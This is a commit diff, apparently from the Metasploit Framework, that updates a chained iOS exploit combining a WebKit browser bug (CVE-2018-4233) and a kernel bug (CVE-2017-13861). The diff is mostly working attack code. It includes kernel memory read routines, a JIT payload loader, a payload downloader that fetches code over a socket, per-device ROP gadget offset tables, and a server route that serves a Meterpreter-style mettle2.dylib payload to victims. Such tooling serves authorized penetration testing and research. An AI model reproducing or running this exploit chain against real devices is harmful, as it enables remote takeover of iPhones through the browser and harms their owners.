fix iOS 10 again

2019-04-03 06:49:44 +08:00 · 2019-04-03 06:49:44 +08:00 · e6a8d66460
parent b7574f2dd8
commit e6a8d66460
5 changed files with 29 additions and 36 deletions
--- a/external/source/exploits/CVE-2017-13861/kernel_utils.m
+++ b/external/source/exploits/CVE-2017-13861/kernel_utils.m
@ -119,9 +119,7 @@ void Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length) {

 uint64_t proc_of_pid(pid_t pid) {
    uint64_t allproc = Find_allproc();
-    LOG("allproc %p", (void*)allproc);
    uint64_t proc = KernelRead_64bits(allproc), pd;
-    LOG("proc %p", (void*)proc);

    while (proc) { //iterate over all processes till we find the one we're looking for
        pd = KernelRead_32bits(proc + 0x10);
--- a/external/source/exploits/CVE-2017-13861/loader.c
+++ b/external/source/exploits/CVE-2017-13861/loader.c
@ -85,10 +85,6 @@ void init(void* dlopen_addr, void* dlsym_addr, void* jitwrite_addr, uint64_t sta
  debug_print("buffer:%p", (void*)payloadBuffer);
  debug_print("nbuffer:%p", (void*)*(uint64_t*)payloadBuffer);
  debug_print("start:%p", (void*)startOfFixMem);
-
-  /*void* libjsc = dlopen_func("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_NOW);*/
-  /*debug_print("jit %p", libjsc);*/
-
 #endif

  load((void*)payloadBuffer, (t_dlsym)dlsym_func, jitwrite_addr, (void*)startOfFixMem, (void*)endOfFixMem);
@ -114,17 +110,6 @@ void performJITMemcpy(t_dlsym _dlsym, void* jitwrite, void* startOfFixMem, void*
    off_t offset = (off_t)((uintptr_t)dst - (uintptr_t)startOfFixMem);
    jitWriteSeparateHeapsFunction(offset, src, size);

-    /*uint64_t* stack_check_guard = _dlsym(RTLD_DEFAULT, "__stack_chk_guard");*/
-    /*char* gadget = _dlsym(RTLD_DEFAULT, "_ZN3JSC10LinkBuffer8linkCodeERNS_14MacroAssemblerEPvNS_20JITCompilationEffortE");*/
-
-    /*// jitcode.s has gadget code*/
-    /*const char* pattern = "\x93\x21\x98\xD2\xF3\xFF\xBF\xF2\xF3\x01\xC0\xF2\x69\x02\x40\x39";*/
-    /*int pattern_length = 16;*/
-    /*while (_memcmp(gadget, pattern, pattern_length))*/
-        /*gadget++;*/
-
-    /*jitcopy(gadget, stack_check_guard, dst, src, size);*/
-
    ASSERT(!_memcmp(dst, src, size));
 }

--- a/external/source/exploits/CVE-2017-13861/payload.m
+++ b/external/source/exploits/CVE-2017-13861/payload.m
@ -31,8 +31,7 @@

 #define SLOG(msg, ...) \
  do { \
-    NSLog(@"GREPME" msg "\n", __VA_ARGS__); \
-    if (getuid() == 123) { \
+    if (getuid() == 0) { \
      FILE* logfile = fopen("/var/mobile/log.txt", "a");\
      fprintf(logfile,msg, __VA_ARGS__); \
      fclose(logfile); \
@ -53,10 +52,15 @@ int download_payload(char* file_path, const char* config_placeholder)
  unlink(file_path);
  SLOG("%s", "Downloading payload\n");

+  const char* payload_url = "payload";
+  if (kCFCoreFoundationVersionNumber >= 1443.00) {
+    payload_url = "payload2";
+  }
  // Load the payload from server
  int sockfd = 0;
  struct sockaddr_in serv_addr;
-  const char *getpayload = "GET /payload HTTP/1.1\r\n\r\n";
+  char getpayload[100];
+  snprintf(getpayload, sizeof(getpayload), "GET /%s HTTP/1.1\r\n\r\n", payload_url);
  const int chunk_size = 4096;
  char* payload_buffer = malloc(chunk_size);
  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
--- a/external/source/exploits/CVE-2017-13861/trustcache.m
+++ b/external/source/exploits/CVE-2017-13861/trustcache.m
@ -10,7 +10,9 @@
 #include "sha256.h"

 #import <Foundation/Foundation.h>
-#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+
+//#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+#define LOG(str, args...)

 struct trust_mem {
    uint64_t next; //struct trust_mem *next;
--- a/modules/exploits/apple_ios/browser/webkit_createthis.rb
+++ b/modules/exploits/apple_ios/browser/webkit_createthis.rb
@ -28,9 +28,10 @@ class MetasploitModule < Msf::Exploit::Remote
        ],
      'References'     => [
          ['CVE', '2018-4233'],
+          ['CVE', '2017-13861'],
          ['URL', 'https://github.com/saelo/cve-2018-4233'],
          ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],
-          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1564'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],
          ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],
        ],
      'Arch'           => ARCH_AARCH64,
@ -73,6 +74,12 @@ class MetasploitModule < Msf::Exploit::Remote
      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
      print_good("Sent payload")
      return
+    elsif request.uri =~ %r{/payload2$*}
+      dylib_path = ::File.join Msf::Config.data_directory, 'mettle', 'aarch64-iphone-darwin', 'bin', 'mettle2.dylib'
+      payload_data = ::File.binread dylib_path
+      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
+      print_good("Sent payload")
+      return
    end

    user_agent = request['User-Agent']
@ -458,14 +465,10 @@ function pwn() {
        "__platform_memmove" : 0x1806ffe00, "_usleep" : 0x18056011c, "_dlopen" : 0x18052dd10, "_dlsym" : 0x18052ddd8, "_mach_task_self_" : 0x1a586e3bc,
        "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1a457c438, },

-        /*
        // iPhone 6S 11.0.3
-        425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc, 
+        425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc,
        "__platform_memmove" : 0x1807bdab0, "_usleep" : 0x1805cee70, "_dlopen" : 0x180587460, "_dlsym" : 0x180587574, "_mach_task_self_" : 0x1b1562fac,
-        "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8,
-        "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00,
-        "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
-        */
+        "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8, "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00, "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
    }

    var offsets = offset_cache[uuid];
@ -514,7 +517,7 @@ function pwn() {
            // mov x4, x20 ; blr x8
            "movx4":     [ [ 0xaa1403e4, 0xd63f0100 ] ],
        }
-        opcode_libs = [
+        var opcode_libs = [
            "/usr/lib/PN548.dylib",     // dispatch, stackloader
            "/usr/lib/libc++.1.dylib",  // ldrx8, regloader, movx4, stackloader
        ];
@ -540,7 +543,6 @@ function pwn() {
        };

        var opcode_libs = [ "/usr/lib/libLLVM.dylib" ];
-
        '}

        var imgs  = Add(hdr, memory.u32(Add(hdr, 0x18)));
@ -718,14 +720,16 @@ function pwn() {
    var movx4               = offsets["movx4"]; // might be null

    var mach_task_self_     = new Int64(memory.readInt64(task_self).lo());
-    var memPoolStart        = memory.readInt64(startOfFixedMem);
    var memPoolEnd          = memory.readInt64(endOfFixedMem);

-    var jitWriteSeparateHeaps;
-    if (syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
-        jitWriteSeparateHeaps = memory.readInt64(syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
-    } else {
-        jitWriteSeparateHeaps = Int64.Zero;
+    var memPoolStart        = Int64.Zero;
+    if (startOfFixedMem) {
+        memPoolStart = memory.readInt64(startOfFixedMem);
+    }
+
+    var jitWriteSeparateHeaps = Int64.Zero;
+    if (offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
+        jitWriteSeparateHeaps = memory.readInt64(offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
    }

    var shsz = new Int64("0x100000");